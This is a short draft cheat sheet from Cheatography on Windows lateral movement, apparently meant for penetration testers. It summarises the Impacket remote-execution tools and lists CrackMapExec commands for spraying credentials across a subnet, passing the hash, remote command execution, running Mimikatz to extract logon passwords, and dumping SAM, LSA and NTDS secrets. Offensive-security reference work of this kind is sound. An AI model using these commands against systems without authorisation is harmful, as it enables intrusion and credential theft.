Show Menu
Cheatography
  1. Home >
  2. Cheat Sheets >

Windows Lateral Movement Cheat Sheet (DRAFT) by

Cheat Sheet for Windows Lateral Movement Techniques

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Impacket

PSExec
Writable share required, default ADMIN$. Intera­ctive shell or single command. Similar to psexec.exe, uses RemComSVC.
SMB - 445
SMBExec
No writable share required. Requires 4 SMB Connec­tions. Doesn't use RemComSVC. Semi-i­nte­ractive shell or single command.
SMB - 445
ATExec
Writable share required, default ADMIN$. Run a single command through task scheduler.
SMB - 445
WMIEexe
Semi-i­nte­ractive shell through WMI. No servic­e/agent instal­lation require, runs elevate privileges if possible. Stealthy.
RPC, WMI - 135
DCOMExec
Semi-i­nte­ractive shell, similar to WMIexec but using different DCOM endpoints. Blocked by default due to Windows firewall rules.
RCP, DCOM - 135
Example: 
python <sc­rip­t.p­y> domain­/us­er:­pas­swo­rd@IP <co­mma­nd>


PSExec, SMBExec, WMIExec will obtain shells if <co­mma­nd> is blank
  

CrackM­apExec

Swiss army knife for pentesting with many features. Spray creden­tials across enviro­nment to enumerate shares, sessions, disks, users, login privil­eges, execute commands, dump SAM and LSA secrets, run mimikatz, and more.
Can perform command execution via Impacket's smbexec, wmiexec, atexec.
Spray domain creds: 
crackm­apexec 192.16­8.1.0/24 -u user -p 'P@ssw0rd' -d domain.com
Spray local creds: 
crackm­apexec 192.16­8.1.0/24 -u user -p 'P@ssw0rd' --loca­l-user
Spray creds from files: 
crackm­apexec 192.16­8.1.0/24 -u users.txt -p passwo­rds.txt
Pass-t­he-­hash: 
crackm­apexec 192.16­8.1.0/24 -u user -H NTLMhash
Execute command: 
crackm­apexec 192.16­8.1.0/24 -u user -p 'password' --exec­-method smbexec -x whoami
Run Mimikatz: 
crackm­apexec 192.16­8.1.0/24 -u user -p 'password' -M module­s/c­red­ent­ial­s/m­imi­aktz.py -o COMMAN­D='­pri­vil­ege­::d­ebu­g;s­eku­rls­a::­log­onp­ass­words'
Common Enumer­ation Options
Enumerate shares: 
--shares
Dump sam, lsa or ntds: 
--sam
--lsa
--ntds
Sessions: 
--sessions
Logged on users: 
--lusers